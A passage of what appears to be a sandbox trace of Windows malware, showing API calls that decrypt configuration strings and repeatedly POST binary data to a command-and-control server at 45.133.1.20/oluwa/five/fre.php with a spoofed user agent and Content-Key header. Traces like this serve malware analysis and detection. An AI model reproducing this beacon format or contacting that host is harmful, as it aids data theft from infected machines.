dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0289.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.646] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.648] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.648] GetProcessHeap () returned 0x6a0000 [0289.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0289.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.651] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0289.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.661] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0289.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.663] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0289.663] GetProcessHeap () returned 0x6a0000 [0289.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.695] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0289.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.696] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0289.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.697] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0289.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.737] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0289.737] GetProcessHeap () returned 0x6a0000 [0289.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0289.737] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0289.738] GetProcessHeap () returned 0x6a0000 [0289.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0289.738] socket (af=2, type=1, protocol=6) returned 0xabc [0289.738] connect (s=0xabc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0289.769] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0289.769] GetProcessHeap () returned 0x6a0000 [0289.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0289.769] GetProcessHeap () returned 0x6a0000 [0289.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0289.770] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0289.771] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0289.771] GetProcessHeap () returned 0x6a0000 [0289.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8530 [0289.771] GetProcessHeap () returned 0x6a0000 [0289.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0289.772] GetProcessHeap () returned 0x6a0000 [0289.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0289.772] GetProcessHeap () returned 0x6a0000 [0289.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0289.773] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0289.774] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0289.774] GetProcessHeap () returned 0x6a0000 [0289.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0289.774] GetProcessHeap () returned 0x6a0000 [0289.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0289.775] send (s=0xabc, buf=0x6bd460*, len=242, flags=0) returned 242 [0289.776] send (s=0xabc, buf=0x6bb998*, len=159, flags=0) returned 159 [0289.776] GetProcessHeap () returned 0x6a0000 [0289.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0289.776] recv (in: s=0xabc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0289.858] GetProcessHeap () returned 0x6a0000 [0289.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0289.859] GetProcessHeap () returned 0x6a0000 [0289.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0289.860] GetProcessHeap () returned 0x6a0000 [0289.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8530 | out: hHeap=0x6a0000) returned 1 [0289.860] GetProcessHeap () returned 0x6a0000 [0289.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0289.861] closesocket (s=0xabc) returned 0 [0289.861] GetProcessHeap () returned 0x6a0000 [0289.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0289.861] GetProcessHeap () returned 0x6a0000 [0289.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0289.862] GetProcessHeap () returned 0x6a0000 [0289.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0289.862] GetProcessHeap () returned 0x6a0000 [0289.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0289.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa80) returned 0xabc [0289.887] Sleep (dwMilliseconds=0xea60) [0289.889] GetProcessHeap () returned 0x6a0000 [0289.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0289.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0289.911] GetProcessHeap () returned 0x6a0000 [0289.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0289.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.913] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0289.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.917] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.919] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.919] GetProcessHeap () returned 0x6a0000 [0289.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0289.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.921] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0289.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.922] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0289.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.923] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0289.923] GetProcessHeap () returned 0x6a0000 [0289.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.928] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.929] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.930] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.931] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.931] GetProcessHeap () returned 0x6a0000 [0289.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0289.932] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0289.932] GetProcessHeap () returned 0x6a0000 [0289.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0289.933] GetProcessHeap () returned 0x6a0000 [0289.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0289.933] GetProcessHeap () returned 0x6a0000 [0289.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0289.934] GetProcessHeap () returned 0x6a0000 [0289.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0289.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.935] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0289.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0289.967] GetProcessHeap () returned 0x6a0000 [0289.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0289.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.972] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0289.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.973] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0289.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.974] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.974] GetProcessHeap () returned 0x6a0000 [0289.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0289.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.976] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0289.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.977] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0289.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0289.979] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0289.979] GetProcessHeap () returned 0x6a0000 [0289.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0289.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.984] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0289.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.986] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0289.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.987] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0289.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.988] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0289.988] GetProcessHeap () returned 0x6a0000 [0289.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0289.988] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0289.988] GetProcessHeap () returned 0x6a0000 [0289.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0289.988] socket (af=2, type=1, protocol=6) returned 0xac0 [0289.989] connect (s=0xac0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0290.016] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0290.016] GetProcessHeap () returned 0x6a0000 [0290.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0290.016] GetProcessHeap () returned 0x6a0000 [0290.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0290.017] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.018] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0290.018] GetProcessHeap () returned 0x6a0000 [0290.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8230 [0290.018] GetProcessHeap () returned 0x6a0000 [0290.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.019] GetProcessHeap () returned 0x6a0000 [0290.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0290.019] GetProcessHeap () returned 0x6a0000 [0290.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0290.020] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.021] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0290.021] GetProcessHeap () returned 0x6a0000 [0290.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0290.022] GetProcessHeap () returned 0x6a0000 [0290.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.022] send (s=0xac0, buf=0x6bd460*, len=242, flags=0) returned 242 [0290.023] send (s=0xac0, buf=0x6bb998*, len=159, flags=0) returned 159 [0290.023] GetProcessHeap () returned 0x6a0000 [0290.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0290.023] recv (in: s=0xac0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0290.104] GetProcessHeap () returned 0x6a0000 [0290.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0290.105] GetProcessHeap () returned 0x6a0000 [0290.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0290.105] GetProcessHeap () returned 0x6a0000 [0290.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8230 | out: hHeap=0x6a0000) returned 1 [0290.106] GetProcessHeap () returned 0x6a0000 [0290.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0290.106] closesocket (s=0xac0) returned 0 [0290.107] GetProcessHeap () returned 0x6a0000 [0290.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0290.107] GetProcessHeap () returned 0x6a0000 [0290.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.108] GetProcessHeap () returned 0x6a0000 [0290.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0290.108] GetProcessHeap () returned 0x6a0000 [0290.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0290.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa28) returned 0xac0 [0290.113] Sleep (dwMilliseconds=0xea60) [0290.116] GetProcessHeap () returned 0x6a0000 [0290.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0290.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0290.141] GetProcessHeap () returned 0x6a0000 [0290.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.143] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.169] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.170] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.170] GetProcessHeap () returned 0x6a0000 [0290.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.172] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0290.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.173] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.175] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0290.175] GetProcessHeap () returned 0x6a0000 [0290.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.179] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.180] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.182] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.183] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.183] GetProcessHeap () returned 0x6a0000 [0290.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0290.183] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0290.184] GetProcessHeap () returned 0x6a0000 [0290.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0290.184] GetProcessHeap () returned 0x6a0000 [0290.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.184] GetProcessHeap () returned 0x6a0000 [0290.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0290.185] GetProcessHeap () returned 0x6a0000 [0290.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0290.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.242] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0290.254] GetProcessHeap () returned 0x6a0000 [0290.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.258] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.274] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.275] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.275] GetProcessHeap () returned 0x6a0000 [0290.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.278] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0290.279] 